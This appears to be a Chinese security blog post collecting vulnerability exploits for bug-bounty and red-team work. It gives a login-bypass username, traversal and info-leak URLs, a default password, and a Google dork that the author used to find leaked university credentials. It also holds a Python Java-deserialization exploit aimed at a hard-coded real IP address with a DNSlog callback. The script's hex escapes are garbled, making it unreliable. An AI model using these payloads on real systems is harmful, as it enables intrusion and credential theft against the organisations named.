漏洞复现（利用、SRC挖掘）合集（二）

前期的成果

结合HW泄露的新漏洞利用（挖掘）的合集

1.浪潮ClusterEngineV4.0 任意用户登录漏洞

用户名为admin|pwd，密码任意，登陆进控制台且用户有一定权限

修复建议：过滤非法字符（|），上交大学的系统就这样修复的漏洞

2.SonarQube api 信息泄露漏洞 CVE-2020-27986

漏洞URL：

/api/settings/values

泄露部分的敏感信息

3.用友ERP-NC 目录遍历漏洞

exp：

/NCFindWeb?service=IPreAlertConfigService&filename=

需要读取文件则在filename后添加文件名

/NCFindWeb?service=IPreAlertConfigService&filename=menu.jsp

遇到目录名则用./进行穿越

4.XXL-JOB 任务调度中心 后台默认弱口令

admin/123456

5.SRC敏感信息泄露

敏感信息不是第一次挖了，这次是google语法梭了一把，找有目录遍历的网站

site:edu.cn intitle:index.of

找到某大学的采购平台，遍历发现会上传日志文件，日志文件包含登陆邮箱和密码

6.用友 NC XbrlPersistenceServlet反序列化（只有exp，没复现成功）

今年红队打过的漏洞

import requests
import threadpool
import urllib3
import sys
import base64

#目前测试影响版本：nc6.5
#漏洞url为：
#/service/~xbrl/XbrlPersistenceServlet

 dnslog = "x74x62x6bx37x70x6ax2ex63x65x79x65x2ex69x6f"#dnslog把字符串转16进制替换该段，测试用的ceye.io可以回显 
 data = "xacxedx00x05x73x72x00x11x6ax61x76x61x2ex75x74x69x6cx2ex48x61x73x68x4dx61x70x05x07xdaxc1xc3x16x60xd1x03x00x02x46x00x0ax6cx6fx61x64x46x61x63x74x6fx72x49x00x09x74x68x72x65x73x68x6fx6cx64x78x70x3fx40x00x00x00x00x00x0cx77x08x00x00x00x10x00x00x00x01x73x72x00x0cx6ax61x76x61x2ex6ex65x74x2ex55x52x4cx96x25x37x36x1axfcxe4x72x03x00x07x49x00x08x68x61x73x68x43x6fx64x65x49x00x04x70x6fx72x74x4cx00x09x61x75x74x68x6fx72x69x74x79x74x00x12x4cx6ax61x76x61x2fx6cx61x6ex67x2fx53x74x72x69x6ex67x3bx4cx00x04x66x69x6cx65x71x00x7ex00x03x4cx00x04x68x6fx73x74x71x00x7ex00x03x4cx00x08x70x72x6fx74x6fx63x6fx6cx71x00x7ex00x03x4cx00x03x72x65x66x71x00x7ex00x03x78x70xffxffxffxffx00x00x00x50x74x00x11"+dnslog+"x3ax38x30x74x00x00x74x00x0e"+dnslog+"x74x00x04x68x74x74x70x70x78x74x00x18x68x74x74x70x3ax2fx2f"+dnslog+"x3ax38x30x78" uploadHeader={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"} req = requests.post("http://183.234.129.162:889/service/~xbrl/XbrlPersistenceServlet", headers=uploadHeader, verify=False, data=data, timeout=25) 
 print (req.text)

dnslog上一直没有回显，试了很多站（受影响版本不是很好找）

7.Tomcat example漏洞

某学校的洞，看我同学在火线SRC交过才知道这种是能算洞的（默默打开之前一顿乱扫的awvs，找到了这个库存漏洞）

搭建网站后未删除模板，导致会产生风险

session 样例中（/examples/servlets/servlet/SessionExample）允许用户对 session 进行操纵，可被黑客利用来绕过网站验证机制直接登录后台。